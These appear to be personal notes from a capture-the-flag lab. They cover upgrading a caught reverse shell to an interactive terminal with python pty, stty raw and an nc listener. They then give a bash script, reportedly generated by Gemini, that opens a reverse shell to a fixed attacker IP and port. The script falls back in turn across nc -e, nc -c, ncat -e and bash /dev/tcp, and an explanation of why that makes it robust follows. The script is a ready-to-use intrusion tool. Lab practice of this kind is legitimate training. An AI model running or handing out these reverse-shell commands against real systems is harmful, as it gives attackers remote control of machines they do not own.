Shell Stabilization
From Reverse Shell to full interactive XTERM
```
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@cybercrafted:/var/www/admin$ ^Z
zsh: suspended  nc -lvnp 4444
┌──(kali㉿kali)-[~/thm/cybercraft]
└─$ stty raw -echo && fg
[1]  + continued  nc -lvnp 4444
XTERM=TERM
```
First, execute the following in the reverse shell obtained through the nc -lnvp 4444 listener:

```
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

Then press ^Z (Ctrl+Z) to background the listener and, in your own terminal, run:

```
stty raw -echo && fg
```

The terminal may appear to hang at this point; to get past it, execute:

```
XTERM=TERM
```

Finally, execute the following in the terminal to make the shell fully interactive, like a normal shell:

```
export TERM=xterm
```
Cool gemini script
```bash
#!/bin/bash
# Set the IP address and port of your attack machine
ATTACK_IP="10.11.72.22"   # Your attack machine's IP
ATTACK_PORT="4444"        # Choose an open port on your attack machine

# Attempt different reverse shell methods for robustness.
# netcat (nc) is often available, but other options are provided as fallbacks.

# Method 1: traditional netcat, which supports -e (run the binary that was actually found)
if command -v nc.traditional >/dev/null 2>&1; then
    nc.traditional -nv "$ATTACK_IP" "$ATTACK_PORT" -e /bin/bash
# Method 2: plain nc; -c is only honoured by builds that support command execution
elif command -v nc >/dev/null 2>&1; then
    nc -nv "$ATTACK_IP" "$ATTACK_PORT" -c /bin/bash
# Method 3: ncat (shipped with Nmap)
elif command -v ncat >/dev/null 2>&1; then
    ncat -nv "$ATTACK_IP" "$ATTACK_PORT" -e /bin/bash
# Method 4: bash's built-in /dev/tcp pseudo-device, as a last resort
elif command -v bash >/dev/null 2>&1; then
    bash -i >& "/dev/tcp/$ATTACK_IP/$ATTACK_PORT" 0>&1
else # no nc, ncat or bash
    echo "No netcat or ncat found. Please install one on the target machine."
fi
```
Explanation of command -v:

command -v NAME >/dev/null 2>&1: the two redirections suppress the output of the command -v command.

>/dev/null: redirects standard output (stdout) to /dev/null. /dev/null is like a black hole; anything sent there is discarded. We don't want the path printed by command -v to appear in the output.

2>&1: redirects standard error (stderr) to the same location as stdout (/dev/null). This matters because if the command doesn't exist, command -v prints an error message to stderr, and we want that suppressed as well.

if and elif: the if and elif statements use the exit code of the command -v command to decide which block of code runs. If command -v finds the command (e.g., nc.traditional), it returns a zero exit code (success) and the corresponding block executes. If command -v doesn't find the command, it returns a non-zero exit code (failure), the if or elif condition is treated as false, and the script moves on to the next elif or to the else block.

How it works in the script:

if command -v nc.traditional …: the script first checks for nc.traditional. This matters because some systems ship a separate nc.traditional binary.

elif command -v nc …: if nc.traditional isn't found, it checks for the standard nc (netcat). Different versions of nc may be installed (e.g., OpenBSD nc), so this is a general check.

elif command -v ncat …: if neither nc.traditional nor nc is found, it checks for ncat, another networking utility that can create reverse shells.

elif command -v bash …: if none of the nc or ncat variants are found, it checks for bash itself and, as a last resort, uses bash's built-in TCP functionality.

else …: if none of the above commands are found, the else block runs and prints an error message.

Why this is important:

This approach makes the reverse shell script adaptable to different systems. It doesn't assume that a specific version of nc or ncat is installed; it checks which tools are available and uses the most appropriate one. That is what makes the script robust: it significantly increases the chances of getting a reverse shell, even if the target system has a limited set of tools.
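The detection pattern described above generalizes to any list of candidate tools. The following script is an added example, not part of the original post or the generated script: it factors the command -v / exit-code check into reusable functions and walks a candidate list in order, exactly as the if/elif/else chain does, but without opening any connection. The helper names (has_cmd, first_available, probe_status) and the deliberately non-existent tool name are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the original post): demonstrates the
# `command -v ... >/dev/null 2>&1` pattern and the exit-code logic behind
# the if/elif/else chain, without starting any network activity.

# has_cmd NAME: exit 0 if NAME resolves to a runnable command, 1 otherwise.
# Both stdout (the resolved path) and stderr (the "not found" message) are
# discarded, so the caller only ever sees the exit status.
has_cmd() {
    command -v "$1" >/dev/null 2>&1
}

# first_available NAME...: print the first NAME that resolves and exit 0;
# print nothing and exit 1 if none does. This is the general form of the
# script's chain: each elif is one more candidate in the list.
first_available() {
    for candidate in "$@"; do
        if has_cmd "$candidate"; then
            printf '%s\n' "$candidate"
            return 0
        fi
    done
    return 1
}

# probe_status NAME: prints "present" or "missing", showing how the exit
# status of command -v drives a branch decision.
probe_status() {
    if has_cmd "$1"; then
        printf 'present'
    else
        printf 'missing'
    fi
}

# Demonstration on a constructed candidate list. The first name is made up
# and should exist on no system; sh is required by POSIX, so the walk
# should settle on it.
if tool=$(first_available no_such_tool_xyz123 sh); then
    echo "first available candidate: $tool"
else
    echo "none of the candidates exist"
fi
```

Because has_cmd discards all output, it can be dropped straight into an if condition; first_available returns the same non-zero status as command -v when nothing matches, so callers can branch on it the same way.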